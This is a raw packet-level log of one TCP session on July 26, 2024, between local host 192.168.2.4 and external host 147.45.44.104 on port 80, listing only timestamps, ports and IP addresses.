Jul 26, 2024 18:56:49.775990963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776000977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776010990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776020050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776031017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776041031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776072025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.776124001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.776315928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776329041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776339054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776349068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776357889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776369095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776380062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776388884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.776424885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776436090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776441097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.776446104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776457071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776472092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776494980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776505947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776516914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776525974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.776526928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776539087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.776595116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.776642084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.777337074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777347088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777355909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777365923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777375937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777386904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777396917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777406931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777415991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777426958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777430058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.777436972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777447939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777456999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777463913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777472019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777483940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.777537107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.777592897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.813108921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.813127041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.813141108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.813262939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.813283920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.813296080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.813306093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.813317060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.813632965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.834280968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834304094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834316015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834332943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834345102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834355116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834367037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834378958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834402084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.834451914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.834542036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834573030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834584951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834597111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834620953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.834649086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.834672928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834683895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834696054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834727049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.834752083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.834795952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834808111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.834849119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.835083961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835094929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835108042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835179090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.835215092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835258007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.835288048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835299969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835310936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835324049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835335016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.835361004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.835386038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.835407019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835418940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835429907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835442066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835453033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835484982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.835508108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.835529089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.835587025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.854945898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.855035067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.855047941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.855159044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.855242014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.855253935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.855264902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.855276108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.855318069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.855370045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.872611046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.872678041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.872692108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.872826099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.872850895 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.872869015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.872883081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.872895956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.872972012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.873341084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873353958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873367071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873379946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873394012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873404980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873418093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873430967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.873500109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.873680115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873692036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873744011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.873836994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.873843908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873858929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873869896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873881102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873893023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873903990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873914957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873925924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873938084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873939991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.873950005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873963118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873976946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.873987913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.874048948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.874102116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.874912977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.874927044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.874938965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.874949932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.874960899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.874972105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.874984980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.874984026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.874998093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.875010967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.875021935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.875032902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.875044107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.875056028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.875067949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.875080109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.875092983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.875096083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.875164032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.875942945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.875957966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.875968933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.875981092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.875991106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876003027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876014948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876025915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876036882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876038074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.876049995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876061916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876072884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876085043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876096964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876108885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876113892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.876121044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876136065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876147032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.876177073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.876236916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.877901077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.877917051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.877928019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.877939939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.877952099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.878002882 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.878067017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.903939009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.904031038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.904043913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.904113054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.904126883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.904253006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.904419899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.904432058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.904550076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.930646896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.930686951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.930699110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.930777073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.930778027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.930799961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.930811882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.930824041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.930836916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.930885077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.930994034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931006908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931051016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.931103945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931116104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931127071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931163073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.931163073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.931375027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931386948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931399107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931410074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931421995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931430101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.931435108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931448936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.931508064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.931690931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931701899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931713104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931725025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931735992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931740046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.931749105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931760073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.931762934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931776047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931787968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.931802034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.931802034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.931828976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.931884050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.946031094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.946044922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.946057081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.946099997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.946135998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.946165085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.946177959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.946188927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.946201086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.946221113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.946258068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.946258068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.962423086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.962435007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.962445974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.962508917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.962559938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.962570906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.962582111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.962593079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.962620974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.962652922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.962780952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.962791920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.962801933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.962811947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.962821960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.962831020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.962863922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.962863922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.963066101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963077068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963085890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963095903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963105917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963115931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963150024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.963206053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.963464022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963479042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963489056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963499069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963509083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963519096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963529110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963537931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963548899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963553905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.963558912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963572025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963584900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.963612080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.963671923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.964225054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964236021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964246035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964258909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964265108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964270115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964274883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964278936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964288950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964302063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964307070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.964313984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964325905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964339018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964351892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964361906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964368105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.964381933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.964430094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.964502096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:49.965178967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965190887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965202093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965213060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965224028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965234995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965245008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965256929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:49.965265989 CEST	80	49757	147.45.44.104	192.168.2.4
